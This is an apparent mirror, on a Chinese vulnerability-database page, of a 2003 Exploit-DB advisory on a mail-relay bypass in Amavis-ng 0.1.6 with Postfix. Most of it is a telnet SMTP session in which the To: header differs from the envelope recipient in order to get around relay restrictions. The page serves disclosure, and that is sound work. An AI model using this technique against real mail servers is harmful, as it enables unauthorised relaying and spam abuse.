Amavis 0.1.6 - Header Parsing Mail Relaying

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053815 漏洞类型
发布时间 2003-04-08 更新时间 2003-04-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Unix CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22475
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7306/info

It has been reported that some versions of Amavis-ng do not properly interact with Postfix. Because of this, an attacker may be able to circumvent relay restrictions. 

#> telnet somemx.domain.tld 25
(220 somemx.example.com ESMTP Postfix)
helo amavis-ng
(250 somemx.example.com)
mail from:userX@example.com
(250 ok)
rcpt to:userY@example.com
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@example.com
To: userZ@example.com
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)